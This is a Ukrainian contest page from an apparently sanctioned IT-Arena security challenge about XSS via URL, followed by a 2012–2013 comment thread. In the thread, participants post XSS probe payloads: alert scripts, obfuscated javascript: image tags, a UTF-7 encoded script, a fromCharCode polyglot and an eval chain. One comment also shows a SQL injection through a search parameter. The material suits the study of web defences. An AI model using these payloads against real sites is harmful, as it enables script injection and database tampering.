ЗМАГАННЯ ЗАВЕРШЕНО
XSS через URL на порталі IT-Арена
Конкурс:
Постійно-діючий конкурс з IT-безпеки
Номінація:
IT-безпека
Автор:
Олександр Загарія
Команда:
 
ЗАВДАННЯ

Виявити "дірки", зони ураження у системі Інформаційної Безпеки порталу IT-Арена.


ОПИС РОБОТИ:

Читайте Статтю про ХSS через URL на порталі IT-Арени у розділі Технології - IT-безпека XSS.

ФАЙЛ

ОБГОВОРЕННЯ:
2012-10-02 14:53 -- --:
alert()
2012-10-02 14:53 -- --:
теги удаляются))
2012-10-16 12:00 Іван Безсмертний:
``;!--"=&{()}
2012-10-16 12:25 Іван Безсмертний:
alert(1) alert(2) alert(3) alert(4) alert(5)
2012-10-16 12:28 Іван Безсмертний:
">`"`,/?@%
2012-10-16 12:31 Іван Безсмертний:
>>>>
2012-10-16 12:31 Іван Безсмертний:
script
2012-10-16 13:08 Іван Безсмертний:
",>`< ",
2012-10-16 13:10 Іван Безсмертний:
",>`alert(1);`"",>`
2012-10-16 13:12 Іван Безсмертний:
",>`И тут работает!
2012-10-16 13:13 Іван Безсмертний:
",>`
2012-10-16 13:14 nezumi derzkiy:
alert(`nezumi.tested`)
2012-10-23 11:02 Владислав Урсул:
)))))
2012-11-13 21:32 Іван Литвиненко:
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
2012-11-13 21:32 Іван Литвиненко:
j a v a s c r i p t:alert(`XSS`)
2012-11-13 21:44 Іван Литвиненко:
[post=1000[topic=wj (javascript*:alert (`s *1;&#*49;`)]] [/topic] [/post]
2012-11-13 21:50 Іван Литвиненко:
ну!
2012-11-13 21:51 Іван Литвиненко:
ага.....)
2012-11-13 21:55 Іван Литвиненко:
execScript({},{})
2012-11-13 22:20 Іван Литвиненко:
IMG SRC="jav ascript:alert(`XSS`);">
2012-11-13 22:24 Іван Литвиненко:
a="get"; b="URL(""; c="javascript:"; d="alert(`XSS`);")"; eval(a+b+c+d);
2012-11-13 22:46 Іван Литвиненко:
alert(`Добрый день`)
2012-11-13 22:47 Іван Литвиненко:
<script language = Javascript> alert(`Добрый день`) </script>
2012-11-13 22:48 Іван Литвиненко:
<script language = Javascript> alert(`Добрый день`) < \ script>
2012-11-16 23:12 Дмитро Кутрань:
include();
2012-11-29 18:50 Микита Меленчуков:
/alert(`heel`);
2012-11-30 18:03 Вячеслав Мен:
alert(`Приветшрыиршиа`)
2012-12-07 22:36 Іван Безсмертний:
+ADw-SCRIPT+AD4-alert(`message`);+ADw-/SCRIPT+AD4-
2012-12-07 22:46 Іван Безсмертний:
`>">alert(/XSS4/)
2012-12-07 23:19 Адміністратор:
Безкінечно можна дивитися на воду, вогонь та те, як працюють інші. :)
2012-12-07 23:25 Іван Безсмертний:
ну все ж таки якщо дуже сильно захотіти то можна написати код який не відфільтруєця) але це надоїдає))
2012-12-07 23:30 Адміністратор:
Іване - я знаю, що дірок іще багато, навіть відомо де. Та за півроку самі очевидні дірки себе вже проявили, а для більш серйозних поки що не вистачає у учасників фантазії або навичок. Але, час від часу з`являються товариші, коли приходиться сідати та штопати - відновлювати - штопати - відновлювати ... :).
2012-12-08 15:32 Іван Безсмертний:
та це ще й треба мати бажання їх шукати)) опублікували би якісь нові статті вже чи що) а то якось не цікаво
2012-12-08 16:36 Іван Безсмертний:
`;alert(String.fromCharCode(88,83,83))//`;alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">`>alert(String.fromCharCode(88,83,83))
2013-02-20 16:14 Валерій Кандірал:
Click me!
2013-03-28 13:54 Владислав Соломаха:
$search = $_GET["search"]; "SELECT * FROM base WHERE text LIKE (`%$search_text%`) Для /?search=abc все отлично, но если наберут например /?search=`)+and+(id=`1 получаем запрос "SELECT * FROM base WHERE text LIKE(`%`) AND (id=`1%`)"
2013-04-05 09:16 Олексій Пількевич:
Test
2013-04-05 09:16 Олексій Пількевич:
Test
2013-11-19 17:06 Max Fedotov:
Fef
2013-11-19 17:06 Max Fedotov:
body{ }
2013-11-19 17:07 Max Fedotov:
body{ background-color:#c1c1c1; }
2013-11-19 17:07 Max Fedotov:
hhm...
2013-11-19 19:07 Дмитро Пустовий:
javascript:void(document.body.contentEditable = true);